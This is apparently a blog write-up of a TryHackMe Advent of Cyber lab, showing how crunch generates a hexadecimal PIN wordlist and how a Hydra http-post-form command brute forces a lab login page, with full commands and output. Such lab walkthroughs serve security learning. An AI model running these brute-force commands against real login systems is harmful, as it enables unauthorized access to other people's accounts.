remoteshell.zip
Posts Tags Categories
remoteshell.zip

Contents

THM day 3 - Advent of Cyber

 included in learning AoC
    3 minutes 
/aoc_day_3/featured-image.jpg

The third day is about brute forcing, counting PIN and password possibilities. I have to brute force a secret PIN, I use Crunch to generate a wordlist and Hydra to bruteforce a pin.

Counting PIN possibilities

There are a lot of systems that rely on PIN codes or password authentication, these systems can easily be attacked if there are no measurements taken.

Image we have a four-digit PIN, there is a total of 104 possibilities (0,1,2,3,4,5,6,7,8,9).

Counting password possibilities

Image the following scenario:

  • A digit 0-9
  • Uppercase letter A-Z
  • Lowercase letter a-z

Each character can be one of 62 choices. If the password would be 8 characters, we could make 628 = 218.340.105.584.896 different passwords.

The challenge

Using crunch and hydra, find the PIN code to access the control system and unlock the door. What is the flag?

Solution walkthrough

Upon opening the website, it shows the following interface, with the options: 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F - all the hexadecimal symbols.

https://i.imgur.com/sTYWJOY.png

There is a maximum of 3 characters to be filled in
https://i.imgur.com/vQIC48M.png

With the wrong code, access is denied
https://i.imgur.com/0taDBYN.png

In order to get in I need to brute force the password.

Crunch

Crunch is an amazing tool, since it takes one command to generates a wordlist with all the possibilities crunch 3 3 0123456789ABCDEF -o 3digits.txt


DuxSec@hi$ crunch 3 3 0123456789ABCDEF -o 3digits.txt
Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096 

crunch: 100% completed generating output



DuxSec@hi$ tail 3digits.txt                          
FF6
FF7
FF8
FF9
FFA
FFB
FFC
FFD
FFE
FFF

Great, I have all the options, the next step is to automate the ’login’ process using Hydra.

Hydra

Capturing a invalid login attempt, shows me the details of the request. It sends the post request to /login.php containing the payload pin=<my_pin>
https://i.imgur.com/ixhuWsC.png

With that information I can create the command to brute force
hydra -l '' -P 3digits.txt 10.10.188.183 -s 8000 http-post-form "/login.php:pin=^PASS^:Access denied"


DuxSec@hi$ hydra -l '' -P 3digits.txt 10.10.188.183 -s 8000 http-post-form "/login.php:pin=^PASS^:Access denied" 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-14 11:50:44
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://10.10.188.183:8000/login.php:pin=^PASS^:Access denied
[8000][http-post-form] host: 10.10.188.183   password: 6F5

And Hydra found the password: 6F5.
Trying it successfully logs me in.

https://i.imgur.com/Rf9i5G2.png

Takeaways

  • Use long passwords
  • Hydra is a great tool to brute force
  • Crunch is amazing at generating custom wordlists
Updated on 14 Dec 2023
Read Markdown
 HTBHTBHTBHTB
Back | Home